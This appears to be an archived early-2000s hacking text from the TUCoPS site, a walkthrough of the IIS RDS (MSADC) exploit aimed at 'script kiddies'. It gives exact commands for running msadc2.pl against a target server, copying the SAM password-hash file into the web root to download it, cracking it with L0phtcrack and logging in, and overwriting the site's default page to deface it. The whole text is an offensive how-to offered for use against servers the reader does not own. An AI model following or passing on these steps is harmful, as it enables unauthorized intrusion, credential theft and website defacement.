TUCoPS :: Web :: IIS :: rds.txt

Hacking IIS/PWS - the RDS Exploit 

Hacking IIS/PWS - the RDS Exploit
by r00tsec of Security Espionage Community
May, E oo

For Windoze9x/2k/nt users.
Note: This text is based on the discoveries by RFP!

FIND A SERVER RUNNING IIS OR PWS:

To do that do one of the following things:

a) Go to www.netcraft.com
b) Search for common IIS files via www.altavista.com
   eg: link:/showcode.asp or url:/msadc/ or url:/iishelp

When you have found a server type the following in your browser:

www.server.com/index.ida

and the server will more than gladly tell (90% of the time)
the default publication dir of the web service.

c:\inetpub\wwwroot\ <- default dir


Now download msadc2.pl or msadc.pl from http://sec.subnet.dk in the Programs Section.
Also download ActivePerl Interpreter for Windows from www.activestate.com and install it.

Now from command.com or cmd.exe run:

perl -x c:\msadc2.pl -h www.server.com

It'll probably spit something like this out (if you are lucky):

cmd /c 

then type the command you wish, exempli gratia.:
copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\error.fil

In your browser type:

www.server.com/temp.fil

Tada, you have now got your fingers on the NT Hashed Password file.
to extract that file, type (at cmd/command):

extract temp.fil whatever.file

Now run L0phtcrack from www.l0pht.com/l0phtcrack or similar to crack whatever.file.

When you've cracked whatever.file edit lmhosts.sam (your own) with the following:

www.server.com

Note: lmhosts.sam is located in \winnt\system32\drivers\etc and in \windows\config\ (if I recall?)

Now go to Start|Find|Computer and type:

www.server.com

Click the icon and type in lUsername and password! muhahaha Access probably granted.


TO HACK THA HOMEPAGE:

On www.server.com find the default homepage by typing www.server.com (in your browser) and one of following:
index.htm, index.html, index.asp, default.htm, default.html or default.asp and so on.

Then run (from console)

perl -x c:\msadc2.pl -h www.server.com

cmd/c: echo This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4... > c:\inetpub\wwwroot\default.htm

In you browser it will look like:

This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4...


There are many other ways to hack www.server.com via the RDS exploit, but I'll leave those
for you imagination. 

- If you wan't to add something to this paper or know some kung fu style techniques using RDS exploit, let me know -> r00tsec@hushmail.com!


Call that a good day and stay put for more stunning papers!
Let me know if it worked for you, or if you have any suggestions to other RDS script kiddie methods or the paper just sucks!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH